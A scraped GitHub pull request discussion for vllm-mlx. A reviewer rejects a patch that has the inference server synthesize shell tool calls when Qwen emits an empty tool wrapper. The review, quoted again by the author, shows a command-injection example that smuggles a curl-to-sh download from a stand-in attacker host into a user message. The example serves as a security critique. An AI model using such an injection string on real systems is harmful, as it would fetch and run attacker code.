fix: Qwen tool streaming recovery by kylejeske · Pull Request #497 · waybarrios/vllm-mlx

kylejeske · 2026-05-04T22:50:56Z

Summary

synthesize a request-aware tool call when Qwen emits an empty XML tool wrapper
pass request context into streaming tool parsers while preserving compatibility with older parser shims
defer post-tool streaming content until final decoded text to avoid corrupt partial deltas

Tests

uv run ruff check vllm_mlx/ tests/ --select E,F,W --ignore E402,E501,E731,F811,F841
uv run black --check vllm_mlx/ tests/
uv run pytest tests/test_qwen3_xml_parser.py tests/test_server.py

Notes

uv run mypy vllm_mlx/ --ignore-missing-imports --no-error-summary still reports the repository's existing broad type-check baseline; CI marks that job continue-on-error.
uv run pre-commit run --all-files also fails on existing full-repo hook issues: old Ruff hook argument parsing, broad line-length findings, and the same Mypy baseline. The CI-equivalent Ruff and Black checks above pass.

kylejeske · 2026-05-05T12:32:22Z

@janhilgard @waybarrios

Stack:

MBP M5 Pro
Qwen3.6 on mlx-vllm (latest package)
Pi Agent

I ran into a scenario where asking the model to run a bash command (list the files in this folder) while streaming resulted in a corrupted output. This PR addresses that.

I've attempted to follow your guide for contributing. Please let me know if there is anything missing.

janhilgard

Thanks for the contribution and for following the guide! I understand the frustration with empty `<tool_call></>` wrappers — it's a real model failure case. However, this PR takes an approach that's architecturally dangerous for an inference server. Here's why:

Critical: Server-side tool call synthesis is fundamentally wrong

The core of this PR makes the inference server guess which tool the model meant to call and fabricate arguments. This violates the basic contract of an OpenAI-compatible API: the server faithfully reports what the model generates — it never invents content.

Security: Command injection

The synthesis logic extracts paths from user text via regex and inserts them into shell commands:

args["command"] = f"ls -la {_shell_quote_path(target)}"

A malicious (or just unlucky) user message like:

list files in ~/'; curl attacker.com/pwn | sh; echo '

…gets turned into a synthesized bash command by the server. The client trusts tool calls because they came from the model — here they didn't. The _shell_quote_path function won't catch all edge cases (it never can when the server is fabricating shell commands).

Architectural: Hallucinating on behalf of the model

If the model emits an empty <tool_call></tool_call>, the correct responses are:

Return any text before the marker as content
Log a warning about malformed tool output
Let the client/agent framework decide what to do (retry, fallback, etc.)

The server should never decide "the model probably meant bash" based on fuzzy heuristics like regex-matching "list|show|ls|dir" in the user message. This breaks:

Deterministic reproducibility (same generation → different behavior depending on user text)
Client trust (tool calls are no longer reliably from the model)
Audit trails (who called the tool — the model or the server?)

Streaming deferral is too broad

The defer_content_until_finish flag triggers for all responses after tool messages — not just the broken case. This defeats streaming entirely for multi-turn tool-use conversations (which are the majority use case for tool-calling agents), turning every response into a single final chunk.

What to do instead

The real fix is much simpler:

When the parser encounters <tool_call></> or <tool_call></tool_call> with no content, treat it as content (not a tool call) — the model failed to generate a proper tool invocation.
Optionally strip the empty XML wrapper from the returned content.
Log a warning: logger.warning("Model emitted empty tool_call wrapper, treating as content")

The client/agent (in your case "Pi Agent") can then see the empty/garbled response and retry the request. This is the correct layer for recovery logic — the agent framework, not the inference server.

Minor: Good parts

Hoisting request.model_dump() into request_dict once (instead of calling it repeatedly) is a nice perf improvement — I'd accept that as a standalone change.
The try/except TypeError fallback for the request= kwarg is a reasonable compatibility shim if the streaming parser API genuinely needs request context (for non-synthesis purposes).

tl;dr: An inference server must never fabricate tool calls. The empty-wrapper case should be treated as a generation failure and returned as content (or an empty response), letting the client decide how to recover.

Remove server-side synthesis for empty Qwen XML tool wrappers so the inference server no longer guesses tool names or fabricates arguments. Malformed empty wrappers now produce no tool calls and log a warning, leaving recovery to the client or agent framework. Keep post-tool chat streaming incremental by deriving deltas from cumulative decoded text instead of deferring the entire response until the final chunk. Add regression coverage for empty wrapper handling, no synthesized shell commands, and post-tool streaming behavior.

kylejeske · 2026-05-05T16:12:52Z

Thanks for the contribution and for following the guide! I understand the frustration with empty <tool_call></> wrappers — it's a real model failure case. However, this PR takes an approach that's architecturally dangerous for an inference server. Here's why:

Critical: Server-side tool call synthesis is fundamentally wrong

The core of this PR makes the inference server guess which tool the model meant to call and fabricate arguments. This violates the basic contract of an OpenAI-compatible API: the server faithfully reports what the model generates — it never invents content.

Security: Command injection

The synthesis logic extracts paths from user text via regex and inserts them into shell commands:
args["command"] = f"ls -la {_shell_quote_path(target)}"
A malicious (or just unlucky) user message like:
list files in ~/'; curl attacker.com/pwn | sh; echo '
…gets turned into a synthesized bash command by the server. The client trusts tool calls because they came from the model — here they didn't. The _shell_quote_path function won't catch all edge cases (it never can when the server is fabricating shell commands).

Architectural: Hallucinating on behalf of the model

If the model emits an empty <tool_call></tool_call>, the correct responses are:

Return any text before the marker as content

Log a warning about malformed tool output

Let the client/agent framework decide what to do (retry, fallback, etc.)

The server should never decide "the model probably meant bash" based on fuzzy heuristics like regex-matching "list|show|ls|dir" in the user message. This breaks:

Deterministic reproducibility (same generation → different behavior depending on user text)

Client trust (tool calls are no longer reliably from the model)

Audit trails (who called the tool — the model or the server?)

Streaming deferral is too broad

The defer_content_until_finish flag triggers for all responses after tool messages — not just the broken case. This defeats streaming entirely for multi-turn tool-use conversations (which are the majority use case for tool-calling agents), turning every response into a single final chunk.

What to do instead

The real fix is much simpler:

When the parser encounters <tool_call></> or <tool_call></tool_call> with no content, treat it as content (not a tool call) — the model failed to generate a proper tool invocation.

Optionally strip the empty XML wrapper from the returned content.

Log a warning: logger.warning("Model emitted empty tool_call wrapper, treating as content")

The client/agent (in your case "Pi Agent") can then see the empty/garbled response and retry the request. This is the correct layer for recovery logic — the agent framework, not the inference server.

Minor: Good parts

Hoisting request.model_dump() into request_dict once (instead of calling it repeatedly) is a nice perf improvement — I'd accept that as a standalone change.

The try/except TypeError fallback for the request= kwarg is a reasonable compatibility shim if the streaming parser API genuinely needs request context (for non-synthesis purposes).

tl;dr: An inference server must never fabricate tool calls. The empty-wrapper case should be treated as a generation failure and returned as content (or an empty response), letting the client decide how to recover.

Thanks for the thorough review, a lot of good points here. A bunch of this actually overlaps with an update I already had in flight, so I've folded your feedback into the update. Really appreciate the eye on it.

kylejeske changed the title ~~Fix Qwen tool streaming recovery~~ fix: Qwen tool streaming recovery May 5, 2026

janhilgard requested changes May 5, 2026

View reviewed changes

kylejeske added 2 commits May 5, 2026 09:01

fix: recover Qwen tool-call streaming

17105fa

kylejeske force-pushed the fix-qwen-tool-streaming-recovery branch from 7138147 to ce33946 Compare May 5, 2026 16:02

kylejeske requested a review from janhilgard May 5, 2026 16:04

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

fix: Qwen tool streaming recovery#497

fix: Qwen tool streaming recovery#497
kylejeske wants to merge 2 commits intowaybarrios:mainfrom
kylejeske:fix-qwen-tool-streaming-recovery

kylejeske commented May 4, 2026

Uh oh!

kylejeske commented May 5, 2026 •

edited

Loading

Uh oh!

janhilgard left a comment

Uh oh!

kylejeske commented May 5, 2026

Critical: Server-side tool call synthesis is fundamentally wrong

Security: Command injection

Architectural: Hallucinating on behalf of the model

Streaming deferral is too broad

What to do instead

Minor: Good parts

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

Conversation

kylejeske commented May 4, 2026

Summary

Tests

Notes

Uh oh!

kylejeske commented May 5, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

janhilgard left a comment

Choose a reason for hiding this comment

Critical: Server-side tool call synthesis is fundamentally wrong

Security: Command injection

Architectural: Hallucinating on behalf of the model

Streaming deferral is too broad

What to do instead

Minor: Good parts

Uh oh!

kylejeske commented May 5, 2026

Critical: Server-side tool call synthesis is fundamentally wrong

Security: Command injection

Architectural: Hallucinating on behalf of the model

Streaming deferral is too broad

What to do instead

Minor: Good parts

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

kylejeske commented May 5, 2026 •

edited

Loading